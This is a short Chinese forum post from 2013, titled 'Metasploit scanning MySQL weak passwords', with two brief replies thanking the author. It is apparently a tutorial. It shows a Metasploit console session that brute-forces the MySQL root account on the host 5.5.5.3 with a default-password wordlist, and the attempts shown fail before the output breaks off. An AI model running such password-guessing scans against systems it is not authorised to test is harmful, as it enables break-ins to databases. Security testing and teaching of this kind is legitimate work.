Metasploit扫描Mysql弱口令

Jumbo · 发表于 2013-10-27 21:59:33

msf > use auxiliary/scanner/mysql/mysql_login

msf auxiliary(mysql_login) > set RHOSTS 5.5.5.3

RHOSTS => 5.5.5.3

msf auxiliary(mysql_login) > set USERNAME root

USERNAME => root

msf auxiliary(mysql_login) > set PASS_FILE /pen/msf3/data/wordlists/postgres_default_pass.txt

PASS_FILE => /pen/msf3/data/wordlists/postgres_default_pass.txt

msf auxiliary(mysql_login) > exploit
[*] 5.5.5.3:3306 MYSQL – Found remote MySQL version 5.5.16
[*] 5.5.5.3:3306 MYSQL – [1/7] – Trying username:’root’ with password:”
[*] 5.5.5.3:3306 MYSQL – [1/7] – failed to login as ‘root’ with password ”
[*] 5.5.5.3:3306 MYSQL – [2/7] – Trying username:’root’ with password:’root’
[*] 5.5.5.3:3306 MYSQL – [2/7] – failed to login as ‘root’ with password ‘root’
[*] 5.5.5.3:3306 MYSQL – [3/7] – Trying username:’root’ with password:’tiger’
[*] 5.5.5.3:3306 MYSQL – [3/7] – failed to login as ‘root’ with password ‘tiger’
[*] 5.5.5.3:3306 MYSQL – [4/7] – Trying username:’root’ with password:’postgres’



显示全部楼层 · 发表于 2013-10-27 23:32:29

学习了，不错，讲的太有道理了

显示全部楼层 · 发表于 2013-10-28 00:23:00

相当不错，感谢无私分享精神！